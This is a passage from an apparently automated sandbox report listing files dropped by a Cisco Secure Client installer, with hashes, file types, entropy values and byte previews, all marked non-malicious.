                                                                                                                                                                                                  SHA-512:13A1DE06ECA2A5A2AFE33EBBCBF06BB9FFCC99F21D5E8216BCAC128AFDF9BCD9AFA57E3C4633E0006AAF0E43F11BC336986708D0ADAF154BC29F335F20723473
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:{.. "plugin": {.. "relative-pathname": "vpnipsec.dll", .. "product-version": "5.0.05040".. }..}
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):118
                                                                                                                                                                                                  Entropy (8bit):4.356540827709149
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:3FF1JsfF3dNH4TLPSifLBHcH9XyIMGLz1KCr:3FFYttNYT/LB8HcIRP1fr
                                                                                                                                                                                                  MD5:FCD4980A92383439E287B087524C7BD9
                                                                                                                                                                                                  SHA1:A91FE2BC7B81A89184D6861EEAB6359C43B1510A
                                                                                                                                                                                                  SHA-256:47FA628E122440B0292AA2F4D645EBE7B7536D4400C3EF7EAD4E1C28DD77BCFB
                                                                                                                                                                                                  SHA-512:D72AE7FAE4E5D95C37E4F5B1A08648662DBF7407DDBD1DCAE0C0D07A45D19E0C2D421BB079CE77AACC766608BF1A61E479F755479881226D368273A8BDFED38C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:{.. "plugin": {.. "relative-pathname": "acwebhelper.dll", .. "product-version": "5.0.05040".. }..}
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):42600
                                                                                                                                                                                                  Entropy (8bit):6.850341851307747
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:MoodVjT3FVIgFC1wTDRDGV5ENAMxGhDGVumuAMxkEX:norjT1VImC14DdxGhfxr
                                                                                                                                                                                                  MD5:0FA61F44C8C84022B2D7BC3D2D799562
                                                                                                                                                                                                  SHA1:6AB650840B91DF72F066A3D3882E5A8891F36E07
                                                                                                                                                                                                  SHA-256:65FD7DC0ED6E034BD6A956ABC357631B87B094A3587AAF91793233CC44E813EC
                                                                                                                                                                                                  SHA-512:FBB9156C946C1D110545ABCBB663A5A6B596EC4880F3400B4824728E5EF396B0976DFAF9F6E41377F3825DC7BC9D46DDB6BEA0172C9A51CEB55636D4722460B9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?.X.^h..^h..^h..&...^h..+l..^h..+k..^h..+m..^h..+i..^h..+i..^h..5i..^h..^i..^h..+a..^h..+...^h..^...^h..+j..^h.Rich.^h.................PE..L...K..d.................4...*......p .......P....@.......................................@.................................8].......................^..hH..........LU..T............................U..@............P..,............................text....2.......4.................. ..`.rdata.......P.......8..............@..@.data...L....p.......P..............@....rsrc................R..............@..@.reloc...............Z..............@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3058280
                                                                                                                                                                                                  Entropy (8bit):6.02927936674107
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:49152:I4MfZ031DVdQtj3IDJyfxR6oSmmr2E2y/dVevljoZj8OdoiM/dBVxfkT2vfsLt70:mR3IDJy5R6Smr9/jevlj67KBVxfkQ
                                                                                                                                                                                                  MD5:24DE4ED3FF1FA997F867B591BE4E001D
                                                                                                                                                                                                  SHA1:744D45EBD394880598B597D882AE2B634B9261FB
                                                                                                                                                                                                  SHA-256:7C4330C4BD0C6890C7EFC49AF493056B92332C65BE2BF885CD2A599369BA5349
                                                                                                                                                                                                  SHA-512:8A32756CFFCD10D6DF5F0B6DA917A203115431FE101B2B7746B1D8E76956B12F6AF5CE89BCE29BC505558943F4D661D45E2630B4B5790625B968549146EBEC88
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........[...5Y..5Y..5Y.6X..5Y.0X..5Y..1X..5Y..6X..5Y.1X..5Y..0X..5Y..0X..5Y.4X..5Y..4Y..5Y..<XZ.5Y...Y..5Y..Y..5Y..7X..5YRich..5Y................PE..L......d.................\...(...............p....@.................................../...@..................................n..h.....#..Y...........b..hH...@,.<d......T...................@.......h...@............p..|............................text....Z.......\.................. ..`.rdata...(...p...*...`..............@..@.data....<..........................@....rsrc....Y....#..Z....#.............@..@.reloc..<d...@,..f....+.............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):124520
                                                                                                                                                                                                  Entropy (8bit):6.630785150590808
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:G32Q9YYQbxksfyuSq/NyDbUzb7DCp+iSc9lxma:IhvQSphq/M8vpc9ia
                                                                                                                                                                                                  MD5:0B9FFCA43DA7770F1D5C77C7E9B9B3FE
                                                                                                                                                                                                  SHA1:F4FF02AC97542DAA7AFFA5AF61E956752CCE1809
                                                                                                                                                                                                  SHA-256:329F104D7F9E76BC20CAF68BA7AFC081B7E85EC9DF50E42C715CED146DDF4041
                                                                                                                                                                                                  SHA-512:15F52C15D6A9BFCFA2EAC5045E1DE6087A2222ACD701C7DD2376C3178659C6D83D26E6AED1AF8DD2EF1E8F493B10E4EFE13010C8C670627C748890FFE160917C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Y....v...v...v.......v......v......>v.......v.......v.......v.......v....q..v...v..Dv.......v.......v.......v...vu..v.......v..Rich.v..........PE..L......d...........!................PF..............................................q.....@A.........................y..$....z..d.......................hH...........a..T...........................Hb..@...............4............................text............................... ..`.rdata..Pr.......t..................@..@.data................l..............@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):124520
                                                                                                                                                                                                  Entropy (8bit):6.630785150590808
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:G32Q9YYQbxksfyuSq/NyDbUzb7DCp+iSc9lxma:IhvQSphq/M8vpc9ia
                                                                                                                                                                                                  MD5:0B9FFCA43DA7770F1D5C77C7E9B9B3FE
                                                                                                                                                                                                  SHA1:F4FF02AC97542DAA7AFFA5AF61E956752CCE1809
                                                                                                                                                                                                  SHA-256:329F104D7F9E76BC20CAF68BA7AFC081B7E85EC9DF50E42C715CED146DDF4041
                                                                                                                                                                                                  SHA-512:15F52C15D6A9BFCFA2EAC5045E1DE6087A2222ACD701C7DD2376C3178659C6D83D26E6AED1AF8DD2EF1E8F493B10E4EFE13010C8C670627C748890FFE160917C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Y....v...v...v.......v......v......>v.......v.......v.......v.......v....q..v...v..Dv.......v.......v.......v...vu..v.......v..Rich.v..........PE..L......d...........!................PF..............................................q.....@A.........................y..$....z..d.......................hH...........a..T...........................Hb..@...............4............................text............................... ..`.rdata..Pr.......t..................@..@.data................l..............@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3058280
                                                                                                                                                                                                  Entropy (8bit):6.02927936674107
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:49152:I4MfZ031DVdQtj3IDJyfxR6oSmmr2E2y/dVevljoZj8OdoiM/dBVxfkT2vfsLt70:mR3IDJy5R6Smr9/jevlj67KBVxfkQ
                                                                                                                                                                                                  MD5:24DE4ED3FF1FA997F867B591BE4E001D
                                                                                                                                                                                                  SHA1:744D45EBD394880598B597D882AE2B634B9261FB
                                                                                                                                                                                                  SHA-256:7C4330C4BD0C6890C7EFC49AF493056B92332C65BE2BF885CD2A599369BA5349
                                                                                                                                                                                                  SHA-512:8A32756CFFCD10D6DF5F0B6DA917A203115431FE101B2B7746B1D8E76956B12F6AF5CE89BCE29BC505558943F4D661D45E2630B4B5790625B968549146EBEC88
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........[...5Y..5Y..5Y.6X..5Y.0X..5Y..1X..5Y..6X..5Y.1X..5Y..0X..5Y..0X..5Y.4X..5Y..4Y..5Y..<XZ.5Y...Y..5Y..Y..5Y..7X..5YRich..5Y................PE..L......d.................\...(...............p....@.................................../...@..................................n..h.....#..Y...........b..hH...@,.<d......T...................@.......h...@............p..|............................text....Z.......\.................. ..`.rdata...(...p...*...`..............@..@.data....<..........................@....rsrc....Y....#..Z....#.............@..@.reloc..<d...@,..f....+.............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):350819
                                                                                                                                                                                                  Entropy (8bit):5.461097780903613
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:LjH3U1ogMmeb7oVBKIuDVKuAYjG+chxEb1XVnh2MR+5+dJT8eRrDIpFmv0K1t:LjH3UKuVVBKfKh+qMR+5+dJTXDX1t
                                                                                                                                                                                                  MD5:2967DEC829A8EB7B1B28EDE05C47DCB8
                                                                                                                                                                                                  SHA1:F02FD55BF471D0BC97FE6F71ABC0A795B9C87475
                                                                                                                                                                                                  SHA-256:105BEB70A051B9C21C5C98EAB6F3C3E5EC01A54D6FDF25E86FD5BC9F113362DF
                                                                                                                                                                                                  SHA-512:A79CC293592DEF70B0C9EC83874DF23B4FA71DCAAA5C5656B2B0533BC7A91BCC8A65FCBF48124FD2E49D9CCA4B373E03F8294805F76BA19742377DA6856928FE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):350819
                                                                                                                                                                                                  Entropy (8bit):5.461097780903613
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:LjH3U1ogMmeb7oVBKIuDVKuAYjG+chxEb1XVnh2MR+5+dJT8eRrDIpFmv0K1t:LjH3UKuVVBKfKh+qMR+5+dJTXDX1t
                                                                                                                                                                                                  MD5:2967DEC829A8EB7B1B28EDE05C47DCB8
                                                                                                                                                                                                  SHA1:F02FD55BF471D0BC97FE6F71ABC0A795B9C87475
                                                                                                                                                                                                  SHA-256:105BEB70A051B9C21C5C98EAB6F3C3E5EC01A54D6FDF25E86FD5BC9F113362DF
                                                                                                                                                                                                  SHA-512:A79CC293592DEF70B0C9EC83874DF23B4FA71DCAAA5C5656B2B0533BC7A91BCC8A65FCBF48124FD2E49D9CCA4B373E03F8294805F76BA19742377DA6856928FE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):361321
                                                                                                                                                                                                  Entropy (8bit):5.209740954129793
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:LjH3UK9dlRVBKfKh++1/nK0Gg4tIOIeJgzu7b:L7hD1/Eqi
                                                                                                                                                                                                  MD5:896374392BD925153CD66C80C719F912
                                                                                                                                                                                                  SHA1:E640B935A2400502607218A0ACA6CC281EFC26A5
                                                                                                                                                                                                  SHA-256:D8264819DB8F3D333ECAC920A8C7240878114F30610EAB49FD817005199A8D29
                                                                                                                                                                                                  SHA-512:3693C050D0E759439E1B03144F623AB735F268D44F97AC7E7726CAF10B5D43F7266EAD8BD8267F57B79AFEF35945BE8D9157F77C77AFCC367C77706600925EB5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):361321
                                                                                                                                                                                                  Entropy (8bit):5.209740954129793
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:LjH3UK9dlRVBKfKh++1/nK0Gg4tIOIeJgzu7b:L7hD1/Eqi
                                                                                                                                                                                                  MD5:896374392BD925153CD66C80C719F912
                                                                                                                                                                                                  SHA1:E640B935A2400502607218A0ACA6CC281EFC26A5
                                                                                                                                                                                                  SHA-256:D8264819DB8F3D333ECAC920A8C7240878114F30610EAB49FD817005199A8D29
                                                                                                                                                                                                  SHA-512:3693C050D0E759439E1B03144F623AB735F268D44F97AC7E7726CAF10B5D43F7266EAD8BD8267F57B79AFEF35945BE8D9157F77C77AFCC367C77706600925EB5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):354736
                                                                                                                                                                                                  Entropy (8bit):5.123789642260049
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:LjH3U1ogM+Iy/aLiY2DBoVBKIuDVKuAYjG+chxEb1XVnhk0NrNQA/nUkSY:LjH3UKJZLiY2DyVBKfKh+w4i5ZY
                                                                                                                                                                                                  MD5:9D4300C87C9E378A13EFA9999D305929
                                                                                                                                                                                                  SHA1:0A7BB44A99208085296E782FD2E7B22170E7D03A
                                                                                                                                                                                                  SHA-256:D92D3E91F1B4036435CC6E39E2CE048DE7153A54577695313ACA1119DF70DE82
                                                                                                                                                                                                  SHA-512:297D7848FB011D8E79A7EE1B48D42227FC8582848B9232F4ED155B5FA1476C25654885FBD39E0207DD86F619BFC0FDE41A0D448365E5B1D57D7C359B7EAE3B1F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):354736
                                                                                                                                                                                                  Entropy (8bit):5.123789642260049
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:LjH3U1ogM+Iy/aLiY2DBoVBKIuDVKuAYjG+chxEb1XVnhk0NrNQA/nUkSY:LjH3UKJZLiY2DyVBKfKh+w4i5ZY
                                                                                                                                                                                                  MD5:9D4300C87C9E378A13EFA9999D305929
                                                                                                                                                                                                  SHA1:0A7BB44A99208085296E782FD2E7B22170E7D03A
                                                                                                                                                                                                  SHA-256:D92D3E91F1B4036435CC6E39E2CE048DE7153A54577695313ACA1119DF70DE82
                                                                                                                                                                                                  SHA-512:297D7848FB011D8E79A7EE1B48D42227FC8582848B9232F4ED155B5FA1476C25654885FBD39E0207DD86F619BFC0FDE41A0D448365E5B1D57D7C359B7EAE3B1F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):366110
                                                                                                                                                                                                  Entropy (8bit):5.203256685903476
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:LjH3UKZRI1w8uVBKfKh+EMVBfFUwKmXeEXNfl:L7hnRCgwKmXeEdfl
                                                                                                                                                                                                  MD5:283DE4CDF40608573B8CF8ACF853524A
                                                                                                                                                                                                  SHA1:43119C50A0F9459624D7CA1CCC9C65D0474EDC32
                                                                                                                                                                                                  SHA-256:6169558657F7D31BBA1335D14D8515877F0EBCF963604F54D7B8676F59437426
                                                                                                                                                                                                  SHA-512:63FAF192C420503F17700E9B757F864F997B76E3DC41BAA01F664672159FEFDC84F338BBA77B06E5D0DF29FA4A422CCA49FDDAC80F7F64C35570E9430972618F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):366110
                                                                                                                                                                                                  Entropy (8bit):5.203256685903476
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:LjH3UKZRI1w8uVBKfKh+EMVBfFUwKmXeEXNfl:L7hnRCgwKmXeEdfl
                                                                                                                                                                                                  MD5:283DE4CDF40608573B8CF8ACF853524A
                                                                                                                                                                                                  SHA1:43119C50A0F9459624D7CA1CCC9C65D0474EDC32
                                                                                                                                                                                                  SHA-256:6169558657F7D31BBA1335D14D8515877F0EBCF963604F54D7B8676F59437426
                                                                                                                                                                                                  SHA-512:63FAF192C420503F17700E9B757F864F997B76E3DC41BAA01F664672159FEFDC84F338BBA77B06E5D0DF29FA4A422CCA49FDDAC80F7F64C35570E9430972618F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):362312
                                                                                                                                                                                                  Entropy (8bit):5.179123156153952
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:LjH3UKDGU3VBKfKh+GCaWCbQgoksGtxZMexJ8tjjNa+HTDzewKLMYspLW1UbwR+Q:L7hDGBRbBwR+Q
                                                                                                                                                                                                  MD5:0656A498B0ADF363A0D80BAF67A4C24B
                                                                                                                                                                                                  SHA1:A8D919E044EF0C20BDC2671F74EE38C3428C42D1
                                                                                                                                                                                                  SHA-256:F1BBF2D27C7CD80028E38E54097A975735F06035674BD991AAFF05429B479A30
                                                                                                                                                                                                  SHA-512:93D1603302BB59C25CB93B5012CAAB94A846092342CC947F508C46A7BE464F6C40B526E1F080E0536FF577DA74891EC51A3B3A65501547898AAABD71613FA84A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):362312
                                                                                                                                                                                                  Entropy (8bit):5.179123156153952
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:LjH3UKDGU3VBKfKh+GCaWCbQgoksGtxZMexJ8tjjNa+HTDzewKLMYspLW1UbwR+Q:L7hDGBRbBwR+Q
                                                                                                                                                                                                  MD5:0656A498B0ADF363A0D80BAF67A4C24B
                                                                                                                                                                                                  SHA1:A8D919E044EF0C20BDC2671F74EE38C3428C42D1
                                                                                                                                                                                                  SHA-256:F1BBF2D27C7CD80028E38E54097A975735F06035674BD991AAFF05429B479A30
                                                                                                                                                                                                  SHA-512:93D1603302BB59C25CB93B5012CAAB94A846092342CC947F508C46A7BE464F6C40B526E1F080E0536FF577DA74891EC51A3B3A65501547898AAABD71613FA84A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):362333
                                                                                                                                                                                                  Entropy (8bit):5.410491653751883
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:LjH3UKi/6g1JVBKfKh+KLOPdxLFCtnCCt+GawO+:L7hXgpOFxtn+
